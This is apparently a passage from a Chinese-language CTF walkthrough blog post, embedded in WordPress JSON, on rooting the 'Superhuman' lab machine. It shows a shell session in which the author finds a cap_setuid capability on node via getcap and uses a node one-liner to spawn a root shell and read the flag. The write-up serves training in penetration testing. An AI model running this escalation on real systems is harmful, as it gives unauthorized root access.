fred@superhuman:\/var\/www\/html$ echo *\nindex.html nietzsche.jpg notes-tips.txt salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ busybox \nBusyBox v1.30.1 (Debian 1:1.30.1-4) multi-call binary.\nBusyBox is copyrighted by many authors between 1998-2015.\nLicensed under GPLv2. See source distribution for detailed\ncopyright notices.\n\nUsage: busybox [function [arguments]...]\n or: busybox --list[-full]\n or: busybox --show SCRIPT\n or: busybox --install [-s] [DIR]\n or: function [arguments]...\n\n BusyBox is a multi-call binary that combines many common Unix\n utilities into a single executable. Most people will create a\n link to busybox for each function they wish to use and BusyBox\n will act like whatever it was invoked as.\n\nCurrently defined functions:\n [, [[, acpid, adjtimex, ar, arch, arp, arping, ash, awk, basename, bc, blkdiscard, blockdev, brctl, bunzip2, bzcat, bzip2, cal, cat, chgrp,\n chmod, chown, chroot, chvt, clear, cmp, cp, cpio, cttyhack, cut, date, dc, dd, deallocvt, depmod, devmem, df, diff, dirname, dmesg,\n dnsdomainname, dos2unix, du, dumpkmap, dumpleases, echo, egrep, env, expand, expr, factor, fallocate, false, fatattr, fgrep, find, fold, free,\n freeramdisk, fsfreeze, fstrim, ftpget, ftpput, getopt, getty, grep, groups, gunzip, gzip, halt, head, hexdump, hostid, hostname, httpd,\n hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, ifconfig, ifdown, ifup, init, insmod, ionice, ip, ipcalc, ipneigh, kill, killall, klogd, last,\n less, link, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname, logread, losetup, ls, lsmod, lsscsi, lzcat, lzma, lzop,\n md5sum, mdev, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mt, mv, nameif, nc,\n netstat, nl, nologin, nproc, nsenter, nslookup, nuke, od, openvt, partprobe, paste, patch, pidof, ping, ping6, pivot_root, poweroff, printf,\n ps, pwd, rdate, readlink, realpath, reboot, renice, reset, resume, rev, rm, rmdir, rmmod, route, rpm, rpm2cpio, run-init, run-parts, sed, seq,\n setkeycodes, setpriv, setsid, sh, sha1sum, sha256sum, sha512sum, shred, shuf, sleep, sort, ssl_client, start-stop-daemon, stat, strings, stty,\n svc, svok, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset, tee, telnet, test, tftp, time, timeout, top, touch,\n tr, traceroute, traceroute6, true, truncate, tty, ubirename, udhcpc, udhcpd, uevent, umount, uname, uncompress, unexpand, uniq, unix2dos,\n unlink, unlzma, unshare, unxz, unzip, uptime, usleep, uudecode, uuencode, vconfig, vi, w, watch, watchdog, wc, wget, which, who, whoami, xargs,\n xxd, xz, xzcat, yes, zcat\n(remote) fred@superhuman:\/var\/www\/html$ busybox ls\nindex.html nietzsche.jpg notes-tips.txt salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ busybox ls -la\ntotal 44\ndrwxrwxrwx 2 www-data www-data 4096 Mar 31 2021 .\ndrwxrwxrwx 3 www-data www-data 4096 Mar 31 2021 ..\n-rwxrwxrwx 1 www-data www-data 658 Mar 31 2021 index.html\n-rwxrwxrwx 1 www-data www-data 22211 Mar 31 2021 nietzsche.jpg\n-rwxrwxrwx 1 www-data www-data 358 Mar 31 2021 notes-tips.txt\n-rwxrwxrwx 1 www-data www-data 452 Mar 31 2021 salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ cd ..\/;\n(remote) fred@superhuman:\/var\/www$ cd \/\n(remote) fred@superhuman:\/$ sudo -l\n-bash: sudo: command not found\n(remote) fred@superhuman:\/$ busybox sudo -l\nsudo: applet not found<\/code><\/pre>\n\u4e00\u65e0\u6240\u83b7\uff0c\u770b\u5e08\u5085\u95e8\u7684wp\u662f\u5bf9Capabilities<\/code>\u6743\u9650\u8fdb\u884c\u4e86\u67e5\u8be2\uff0c\u8fd9\u65b9\u9762\u6211\u786e\u5b9e\u7f3a\u4e4f\u654f\u611f\u4e86\uff0c\u4e0b\u6b21\u4e00\u5b9a\u6ce8\u610f\uff01<\/p>\n(remote) fred@superhuman:\/$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/node = cap_setuid+ep<\/code><\/pre>\n\u7136\u540e\u67e5\u627e\u76f8\u5173\u7684\u6f0f\u6d1e\uff0c\u53ea\u6709node\u6709\u6b64\u6f0f\u6d1e\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
(remote) fred@superhuman:\/$ cd \/tmp\n(remote) fred@superhuman:\/tmp$ \/usr\/bin\/node -e 'process.setuid(0); require("child_process").spawn("\/bin\/sh", {stdio: [0, 1, 2]})'\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/tmp\\[\\]$ whoami;id\nroot\nuid=0(root) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/tmp\\[\\]$ cd \/root\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/root\\[\\]$ busybox ls -la\ntotal 28\ndrwx------ 3 root root 4096 Apr 2 2021 .\ndrwxr-xr-x 18 root root 4096 Mar 31 2021 ..\nlrwxrwxrwx 1 root root 9 Mar 31 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Mar 31 2021 .local\n-rw------- 1 root root 5 Apr 2 2021 .node_repl_history\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 16 Mar 31 2021 root.txt\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/root\\[\\]$ cat root.txt\nImthesuperhuman<\/code><\/pre>\n\u5f97\u5230flag\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Superhuman \u4eca\u5929\u65e9\u4e0a\u53d1\u73b0\u5df2\u7ecf\u88ab\u6628\u5929\u7b2c\u4e8c\u540d\u8d76\u4e8680\u591a\u5206\u4e86\uff0c\u5f97\u52a0\u73ed\u4e86\uff0c\u54c8\u54c8\u54c8\u3002 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nm […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-524","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=524"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524\/revisions"}],"predecessor-version":[{"id":525,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524\/revisions\/525"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=524"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240411115551882\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311994.png\")
<\/div><\/p>\n![\"image-20240411115822940\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311996.png\")
<\/div><\/p>\n![\"image-20240411123634329\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311997.png\")
<\/div>![\"image-20240411123830079\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311998.png\")
<\/div><\/p>\n![\"image-20240411124304803\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311999.png\")
<\/div><\/p>\n![\"image-20240411125057805\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311000.png\")
<\/div><\/p>\n![\"image-20240411130734610\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311001.png\")
<\/div><\/p>\n